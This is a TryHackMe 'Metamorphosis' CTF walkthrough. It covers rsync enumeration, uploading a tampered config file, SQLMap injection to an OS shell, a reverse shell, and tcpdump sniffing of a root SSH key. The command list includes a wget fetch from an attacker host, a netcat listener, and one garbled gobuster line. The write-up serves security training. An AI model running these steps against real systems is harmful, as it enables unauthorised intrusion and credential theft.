Introduction

In this walkthrough, we covered enumerating Rsync and performed packet sniffing with Tcpdump to extract relevant information as part of Incognito CTF Metamorphosis TryHackMe.


Initial Reconnaissance

My first step was to run an Nmap scan to see what services were running on the machine. The scan revealed several open ports, including SSH (22), HTTP (80), SMB (139 and 445), and most interestingly, rsync (873). The rsync service immediately caught my eye as a potential entry point.

Next, I turned my attention to the web server on port 80. It was just a default Apache page, so I fired up Gobuster to look for hidden directories. Gobuster found /index.php and /admin, but trying to access /admin gave me a “403 Forbidden” error. Looking at the page’s source code, I found a clue: the admin functionality was only available in a “development environment.” This told me I needed to find and modify a configuration file, likely a web.ini file, to switch the environment from “production” to “development.”

Exploiting Rsync

With the web server at a temporary dead end, I went back to the rsync service. I used an Nmap script to list the available rsync modules and found one named “conf.” I then used the rsync command to list the contents of this “conf” module, which revealed several configuration files, including mysql.ini and, just as I suspected, web.ini.

I downloaded these files to my machine and, upon inspecting web.ini, I found a set of hardcoded credentials: username “tom” and password “cat.” I also saw the environment variable was set to “production.” I changed this to “development” and then used rsync to upload the modified web.ini file back to the target machine.

SQL Injection and a Reverse Shell

With the environment now set to “development,” I was able to access the /admin page. The page had an input field to get user information. I fired up Burp Suite to intercept the request and then used SQLMap to test for SQL injection vulnerabilities on the username parameter. SQLMap quickly found a vulnerability and even gave me an OS shell!

From there, I tried a few different reverse shell one-liners and successfully got a connection back to my machine using a PHP reverse shell. I now had a shell as the www-data user.

Privilege Escalation

To escalate my privileges, I downloaded and ran pspy, a tool that monitors running processes. Pspy revealed a recurring curl process running as root. This process was accessing a local port (1027) and passing a parameter. This looked like a promising vector for privilege escalation.

Since the curl process was accessing a local port, I used tcpdump on the target machine to sniff the traffic on the loopback interface and saved it to a pcap file. I then transferred this file back to my machine and opened it in Wireshark. Analyzing the captured traffic, I found an SSH private key within the HTTP response of the curl request.

Getting Root

I saved the SSH private key to a file, gave it the correct permissions, and then used it to SSH into the machine as the root user. Success! I had full root access. From there, it was a simple matter of finding the root flag in /root/root.txt and the user flag in /home/user/user.txt.

Technical Commands

Here are some of the key commands I used during this engagement:

  • Gobuster for directory enumeration:
    • sudo go buster dash u [IP_ADDRESS] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
  • Nmap Scripting Engine for rsync enumeration:
    • ls -la /usr/share/nmap/scripts | grep rsync
    • sudo nmap --script rsync-list-modules -p 873 [IP_ADDRESS]
  • Rsync for listing and downloading files:
    • rsync rsync://[IP_ADDRESS]/conf
    • mkdir rsync
    • rsync -av rsync://[IP_ADDRESS]/conf ./rsync
  • Rsync for uploading files:
    • rsync -av web.ini rsync://[IP_ADDRESS]/conf/web.ini
  • SQLMap for SQL injection:
    • sqlmap -r request --dbs --level 5 --risk 3 --os-shell
  • Netcat listener:
    • nc -lvp 4545
  • Python HTTP server:
    • python3 -m http.server
  • Wget for downloading files:
    • wget http://[ATTACKER_IP]:8000/pspy64s
  • Changing file permissions:
    • chmod +x pspy64s
  • Running pspy:
    • ./pspy64s
  • Tcpdump for sniffing traffic:
    • sudo tcpdump -i lo -w curl.pcapp
  • Moving files:
    • mv curl.pcapp /var/www/html
  • SSH with private key:
    • chmod 600 id_rsa
    • ssh -i id_rsa root@[IP_ADDRESS]
  • Listing and reading flags:
    • ls
    • cat root.txt
    • cat user.txt

Metamorphosis TryHackMe Room Answers

user.txt

root.txt

Video WalkThrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles